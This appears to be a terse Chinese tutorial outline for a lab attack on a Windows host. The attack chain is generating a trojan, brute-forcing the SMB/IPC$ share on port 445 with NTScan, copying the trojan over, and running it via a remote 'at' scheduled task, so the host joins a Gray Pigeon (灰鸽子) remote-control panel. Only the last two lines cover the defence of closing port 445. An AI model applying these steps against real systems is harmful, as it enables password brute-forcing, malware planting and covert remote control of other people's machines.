一、生成木马
二、爆破smb服务
2.1、使用ScanPort扫描服务器开放的端口
2.2、使用NTScan暴力破解ipc$(445端口smb服务)
使用cmd命令连接要攻击的服务器(smb服务,端口445)
拷贝木马文件到要攻击的服务器
在要攻击的服务器执行一个计划任务
命令:net time \\192.168.27.129
作用:获取要攻击的服务器的当前系统时间
命令:at \\192.168.27.129 11:28 c:\Server_Setup.exe
查看任务是否已经生效
在11:28时可以看到灰鸽子中已经有肉鸡加入
关闭445端口
关闭Server服务即可关闭445端口